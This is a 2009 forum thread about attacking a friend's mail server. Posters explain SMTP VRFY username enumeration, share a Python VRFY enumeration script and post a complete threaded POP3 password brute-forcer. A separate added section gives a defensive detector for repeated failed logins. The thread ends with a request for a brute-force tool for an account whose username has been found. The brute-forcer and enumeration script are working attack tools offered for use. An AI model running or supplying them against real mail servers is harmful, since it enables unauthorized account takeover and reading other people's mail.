unixpro Posted March 31, 2009

I was wondering if anyone has done, or knows where to point me in the right direction. My mate has set up an email server at his house and wants me to test it, e.g. Metasploit and so forth, but I have never done brute force email attacks. I guess you use a dictionary attack, but how do you get a list of email accounts on that server?

Cheers
DingleBerries Posted March 31, 2009

> how do you get a list of email accounts on that server ?
> I guess you use a dictionary attack

brute force
blk Posted March 31, 2009

> how do you get a list of email accounts on that server ?

Have a look at SMTP enumeration techniques. If the server allows VRFY you can brute force the email accounts. Write a script that takes a list of names (joe, jim, jon) and then tags the domain to it (@blogs.com), then VRFY against the server.

What server is he using?
gEEEk Posted April 1, 2009

I think Brutus can conduct a bruteforce attack against POP3. Correct me if I'm wrong but a bruteforce attack and a dictionary attack are two different things.

Bruteforce - try every combination of a certain number of characters
Dictionary - uses wordlists to try passwords

I think there is an old Python script called GooMail, previously included in the BT2 suite, which used some Google parameters to filter out mail addresses based on a certain domain.

Good luck!

/gEEEk :)
DingleBerries Posted April 1, 2009

> Correct me if I'm wrong but a bruteforce attack and a dictionary attack are two different things.

You are sorta right, IMO. Both of them are throwing shit at the wall to see what sticks, so either way you are trying to brute force it, only with a dictionary you have a predefined set of words. Depending on what he is running as the POP3 server it shouldn't be that hard. Admin, HISNAME, CONTACT @whatever.com. A bruteforce attack is going to do some stupid shit and get picked up fairly quickly with a decent IDS. Go with a word list, and Python.
unixpro Posted April 2, 2009

Yeah, I tried a Python script for a dictionary attack to get usernames, but I was unsuccessful due to VRFY being disabled. I might try some other methods tonight.

I used this:

```python
#!/usr/bin/python
import socket
import sys
import fileinput

if len(sys.argv) !=2:
    print "Usage: <inputfile>"
    sys.exit(0)

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xx.xxx.xx.xxx',25))
banner=s.recv(1024)
print banner
for line in fileinput.input():
    s.send('VRFY '+line)
    result=s.recv(1024)
    print result
s.close()
```

It worked, but the damn server had VRFY disabled. Anyone know some other methods? Otherwise I'll try some brute force.
DingleBerries Posted April 2, 2009

Have you scanned the host with nmap? Are there other services running?

Here is your code

```python
#!usr/bin/python
#Pop3 Brute Forcer
#d3hydr8[at]gmail[dot]com

import threading, time, random, sys, poplib
from copy import copy

if len(sys.argv) !=4:
    print "Usage: ./popbrute.py <server> <userlist> <wordlist>"
    sys.exit(1)

try:
    users = open(sys.argv[2], "r").readlines()
except(IOError):
    print "Error: Check your userlist path\n"
    sys.exit(1)

try:
    words = open(sys.argv[3], "r").readlines()
except(IOError):
    print "Error: Check your wordlist path\n"
    sys.exit(1)

try:
    pop = poplib.POP3(sys.argv[1])
    welcome = pop.getwelcome()
    pop.quit()
except (poplib.error_proto):
    welcome = "No Response"
    pass

print "\n\t   d3hydr8[at]gmail[dot]com popBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Server response:",welcome,"\n"

wordlist = copy(words)

def reloader():
    for word in wordlist:
        words.append(word)

def getword():
    lock = threading.Lock()
    lock.acquire()
    if len(words) != 0:
        value = random.sample(words, 1)
        words.remove(value[0])
    else:
        print "Reloading Wordlist - Changing User\n"
        reloader()
        value = random.sample(words, 1)
        users.remove(users[0])
    lock.release()
    return value[0][:-1], users[0][:-1]

class Worker(threading.Thread):

    def run(self):
        value, user = getword()
        try:
            print "-"*12
            print "User:",user,"Password:",value
            pop = poplib.POP3(sys.argv[1])
            pop.user(user)
            pop.pass_(value)
            print "\t\nLogin successful:",value, user
            print pop.stat()
            pop.quit()
            work.join()
            sys.exit(2)
        except (poplib.error_proto), msg:
            #print "An error occurred:", msg
            pass

for i in range(len(words)*len(users)):
    work = Worker()
    work.start()
    time.sleep(1)
```
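The detection side of the remark in this thread that a guessing run gets picked up by a decent IDS, as an added example that is not part of any post here: a sliding-window counter that flags a source address piling up rejected VRFY probes or failed POP3 logins, and records any successful login that follows. The log format (`vrfy-reject`, `auth-fail`, `auth-ok`, `user=`, `rip=`), the sample lines and the names `detect`, `threshold` and `window` are all assumptions made for the illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log; the line format is hypothetical, not a real server's.
SAMPLE_LOG = """\
2009-04-02T21:14:01 smtp vrfy-reject user=joe rip=203.0.113.7
2009-04-02T21:14:02 smtp vrfy-reject user=jim rip=203.0.113.7
2009-04-02T21:15:10 pop3 auth-fail user=alice rip=198.51.100.20
2009-04-02T21:15:20 pop3 auth-ok user=alice rip=198.51.100.20
2009-04-02T21:20:00 pop3 auth-fail user=admin rip=203.0.113.7
2009-04-02T21:20:01 pop3 auth-fail user=admin rip=203.0.113.7
2009-04-02T21:20:02 pop3 auth-fail user=admin rip=203.0.113.7
2009-04-02T21:20:03 pop3 auth-fail user=admin rip=203.0.113.7
2009-04-02T21:20:04 pop3 auth-fail user=admin rip=203.0.113.7
2009-04-02T21:20:05 pop3 auth-ok user=admin rip=203.0.113.7
"""
LINE = re.compile(r"(?P<ts>\S+) (?:smtp|pop3) (?P<ev>vrfy-reject|auth-fail|auth-ok) "
                  r"user=(?P<user>\S+) rip=(?P<rip>\S+)")

def detect(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag IPs with >= threshold failed probes (VRFY or POP3 auth) inside window."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    users = defaultdict(set)      # ip -> every username it has probed
    totals = defaultdict(int)     # ip -> failures seen so far
    alerts = {}
    for line in lines:            # lines are assumed to be in chronological order
        m = LINE.match(line)
        if not m:
            continue              # skip anything not in the assumed format
        ts, ip = datetime.fromisoformat(m["ts"]), m["rip"]
        if m["ev"] == "auth-ok":
            if ip in alerts:      # a login succeeded from an already flagged source
                alerts[ip]["ok_after_fail"].append(m["user"])
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window: # expire failures older than the window
            q.popleft()
        users[ip].add(m["user"])
        totals[ip] += 1
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = {"failures": 0, "users": users[ip], "ok_after_fail": []}
        if ip in alerts:
            alerts[ip]["failures"] = totals[ip]
    return alerts

if __name__ == "__main__":
    print(detect(SAMPLE_LOG.splitlines()))
```

A client pacing itself at one attempt per second, as the script posted above does with `time.sleep(1)`, stays under a per-second rate limit, which is why the count is taken over a 60-second window. A non-empty `ok_after_fail` list is the entry to act on first, since it means a guessed password worked.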
tsaG Posted April 28, 2009

Hi, I figured out what the username is, now how do I get the password to log in to the account? Bruteforce, but which script/program?